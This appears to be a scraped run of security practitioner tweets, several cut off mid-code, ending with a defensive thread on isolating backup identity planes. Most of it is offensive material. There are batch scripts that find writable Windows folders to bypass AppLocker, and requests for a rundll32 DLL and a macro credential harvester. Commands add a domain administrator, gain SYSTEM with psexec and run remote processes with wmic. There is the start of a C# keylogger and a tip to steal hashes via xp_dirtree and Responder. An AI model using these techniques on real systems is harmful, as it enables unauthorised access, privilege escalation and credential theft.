Find writeable folders in c:\windows to bypass AppLocker
@echo off
for /f "delims=" %%a in ('dir /b /ad "c:\windows"') do (
icacls "c:\windows\%%a" | find ":(W)"
if %errorlevel% equ 0 echo "c:\windows\%%a is writable"
)
Try and bypass AppLocker
@echo off
for /f "delims=" %%a in ('dir /b /ad "c:\windows"') do (
echo Testing directory: "c:\windows\%%a"
echo "This file is a test." > "c:\windows\%%a\testfile.txt"
if %errorlevel% equ 0 (
echo "c:\windows\%%a is writable"
del… twitter.com/i/web/status/1…
make me a DLL that runs calc.exe and show me how to execute it via rundll32.exe
make me a cred harvester document in WORD using macros!
Send an email asking for gift vouchers urgently... LOL
net localgroup administrators /add DOMAIN\Username
ok this one is a bit odd..
psexec -i -s cmd.exe
//this will RUN a LOCAL SYSTEM
wmic /node:<remote_computer_name> /user:<username> process call create "<command_to_run>"
namespace Keylogger
{
class Program
{
static void Main(string[] args)
{
// Create a file stream for the log file
StreamWriter logfile = new… twitter.com/i/web/status/1…
INSERT INTO MyTable (ID, Filename, Filedata)
SELECT ROW_NUMBER() OVER (ORDER BY sub.[file]) AS ID,
sub.[file] AS Filename,
BulkColumn AS Filedata
FROM OPENROWSET(BULK… twitter.com/i/web/status/1…
Steal hashes by using xp_dirtree to read a file from a server running responder/inveigh ;)
#######################
CREATE TABLE MyTable (
ID int PRIMARY KEY,
Filename varchar(255),
Filedata varchar(MAX)
);
ok so true OFFLINE backups are hard. but you can look at layered approaches or there's immutable backups etc.
I'm showing this because this works for more than backups.
and YES it's complex from an identity plane point of view (that's the whole point!)
now it gets complicated in the details. If you do this with servers/storage and locations you own Plane 4 can litterally be physically isolated at it's management/access plane. Think of a hypervisor and where the networks are physically split (outside of the requirement to have… twitter.com/i/web/status/1…
You could also do this and skip the remote repo and just wrap identity plane 2 in the same way 4 is working.
The point is: if you compromise plane 1 you don’t compromise plane 2. You can however affect the data on plane 2 by messing up the integrity of plane 1! (Confused yet) 😆… twitter.com/i/web/status/1…